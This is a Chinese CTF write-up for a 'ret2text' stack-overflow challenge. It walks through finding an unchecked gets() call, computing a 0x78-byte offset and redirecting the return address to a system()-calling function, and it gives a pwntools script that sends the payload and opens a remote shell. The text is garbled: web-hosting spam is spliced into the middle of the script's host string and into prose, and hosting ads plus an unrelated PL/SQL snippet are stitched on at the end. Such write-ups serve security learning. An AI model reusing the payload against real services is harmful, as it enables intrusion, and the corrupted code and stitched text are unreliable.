原题在某个名字被51cto屏蔽了的CTF刷题网站,题目为ret2text
题目属于栈溢出
给出了地址和端口,压缩包中有一个二进制程序pwn
file命令可以看到是64位ELF程序,这里pwn是文件名
checksec发现没有开启任何安全措施
程序运行如下:
ida64反汇编,发现gets输入没有边界检查0x70,存在注入:
secure函数调用了system返回一个服务器里的shell,因此目标是调用这个函数:
目标是覆盖tmain存储下一指令的位置,地址偏移除了0x70还要约过存放tmain的ebp的一个单元,即再+8,下一指令覆盖为0x4007B8
因此输入:b’A’ * 0x78 + p64(0x4007b8)
同pwntools服务器托管网编写脚本:
from pwn import *
host = 'challenge-ff699f909c1服务器托管网e3503.sandbox.ctfhub.com'
port = 37126
p = connect(host, port)
payload = b'A' * 0x78 + p64(0x4007b8)
p.sendline(payload)
p.interactive()
运行获取了服务器中的shell,ls发现flag文件,cat获取flag
这道题很简单,主要是了解pwn是在干啥,以及如何利用pwntools编写脚本
知识点主要是函数栈结构
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
机房租用,北京机房租用,IDC机房托管, http://www.fwqtg.net
1、背景 此处简单的记录一下在 oracle中如何使用plsql语法,记录一些简单的例子,防止以后忘记。 2、变量的声明 declare — 声明变量 v_name varchar2(20); — 此变量由 select into 赋值 v_man_sex…